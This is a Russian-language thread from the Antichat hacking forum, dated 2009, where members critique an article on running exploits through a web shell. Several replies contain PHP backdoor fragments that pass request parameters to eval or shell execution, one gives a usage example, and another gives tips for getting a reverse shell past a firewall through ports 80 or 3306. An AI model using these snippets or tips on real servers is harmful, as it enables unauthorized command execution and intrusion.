Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
30.10.2009, 16:14
|
UID: 61998
USER: PowerWMZ
Новичок
Регистрация: 23.07.2008
Сообщений: 5
Провел на форуме:
7186
Репутация:
0
|
|
Идея стара как мир =]
Последний раз редактировалось PowerWMZ; 30.10.2009 в 16:19..
|
|
|
30.10.2009, 16:23
|
UID: 34418
USER: Dimi4
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме:
7617458
Репутация:
3965
|
|
Сообщение от PowerWMZ
Идея стара как мир =]
Возможно, но я уверен не все знали об этом
__________________
BlackHat. MoDL
|
|
|
|
30.10.2009, 17:45
|
UID: 32694
USER: desTiny
Reservists Of Antichat - Level 6
Регистрация: 04.02.2007
Сообщений: 1,152
Провел на форуме:
3008839
Репутация:
1502
|
|
Ого, а запуск сплоитов из-под веба, оказалось, было таким приватным умением? 
__________________
Bedankt euch dafür bei euch selbst.
H_2(S^3/((z1, z2)~(exp(2pi*i/p)z1, exp(2pi*q*i/p)z2)))=Z/pZ
|
|
|
|
30.10.2009, 20:15
|
UID: 27700
USER: SQLHACK
Голос разума
Регистрация: 27.09.2006
Сообщений: 529
Провел на форуме:
1607210
Репутация:
1617
|
|
Димыч , а ты знаешь толк в изращениях , а если честно ты че курил когда это писал ?
это чюдо
echo `$row['comment']`;
выдаст .... хотя нет, это чудо вообще ниxуя не выдаст.. ибо в строку нельзя так вставлять переменную это раз, надо юзать {$row['comment']} да и в таких кавычках это вообще не прокатит ``.
ладно если опустить баги с кавычками то тя получается конструкция перед которой я снимаю шляпу.
echo shell_exec(eval($_POST['e']));
p.s. Все быстро записали себе этот код в блокнот!!
Сорри но статья - шлак
p.p.s Интересно а что же должно быть в E?
наверно
echo('id');
для просмотра ID
p.p.p.s Вследующий раз бери водку или пиво ,и никаких наркотиков )!
__________________
Бойтесь своих желаний. Они могут исполниться....
...О-о-о-о, ушами не услышать, глазами не понять!
Последний раз редактировалось SQLHACK; 30.10.2009 в 20:18..
|
|
|
|
30.10.2009, 21:01
|
UID: 28932
USER: Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
Сообщение от L I G A
выдаст,если елемент массива $row с индексом сomment - будет иметь значение какой-либо команды:
PHP код:
<?php
$output = `$_GET[c]`;
?>
юзать так:
Код:
$_SERVER[SCRIPT_NAME]?c=regedit
А при чем здесь метод Димыча? прр чем здесь твой предыдущий пост?
__________________
Карфаген должен быть разрушен...
|
|
|
|
30.10.2009, 21:16
|
UID: 28932
USER: Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
нет, не ближе у него
eval($_POST['e']);
причем он думает, что в переменную e что-то будет передаваться, и потом исполняться как системная комманда
З.Ы. да и вобще, зачем ты тут постишь очевидные вещи?
Димыч и ты говорили про:
Код:
<?php
$row[comment]='eval($_POST[\'e\']);';
echo `$row[comment]`;
?>
__________________
Карфаген должен быть разрушен...
|
|
|
|
30.10.2009, 21:59
|
UID: 91534
USER: Ins3t
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691
Репутация:
330
|
|
Прочел статью от начала до конца.
В принципе нормально, но для общего развития, так как в статье указан пример, в котором все так круто порутилось, что аж ппц
На самом то деле очень редко так фартит.Часто ядро оказуется патченым, но сейчас не об этом. Бывает, что на серваке попросту не установлен gcc/g++, или не хватает библиотек, приходится компилить на своей тачке или на шелле, или же лить это все туда..
Ну а вообще автору +1.
Последний раз редактировалось Ins3t; 30.10.2009 в 22:02..
|
|
|
|
30.10.2009, 22:26
|
UID: 66724
USER: _gr34t
Участник форума
Регистрация: 26.10.2008
Сообщений: 106
Провел на форуме:
461696
Репутация:
40
|
|
Да, с этим
$row[comment]=eval($_POST['e']);
echo `$row['comment']`;
он попутал... |
|
|
|
30.10.2009, 22:33
|
UID: 53821
USER: (Dm)
Reservists Of Antichat - Level 6
Регистрация: 08.04.2008
Сообщений: 286
Провел на форуме:
2375131
Репутация:
1695
|
|
Но что делать, если и тут всё обламывает файервол?
Как-то столкнулся с тем что не мог сделать бекконнект ... видимо фаервол разрешал исходящие соединения только для ESTABLISHED (ибо веб работал), a также на обычные порты 80, 3306.
Поэтому могу посоветовать, если не получается подключиться бекконектом на какой-нить 9999 порт, попробовать использовать порт 80, 3306 или другой системный.
В моем случае сработало!
|
|
|
|
30.10.2009, 22:42
|
UID: 34418
USER: Dimi4
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме:
7617458
Репутация:
3965
|
|
Ужас какое наркоманство, непомню что на меня так повлияло, видмо зеленый чай, который чего то черным был))
Вот такое извращение, хотя оказывается пашет:
PHP код:
echo shell_exec(eval('system("ls");'));
В серьёз не воспринимать ))))
__________________
BlackHat. MoDL
Последний раз редактировалось Dimi4; 30.10.2009 в 22:45..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
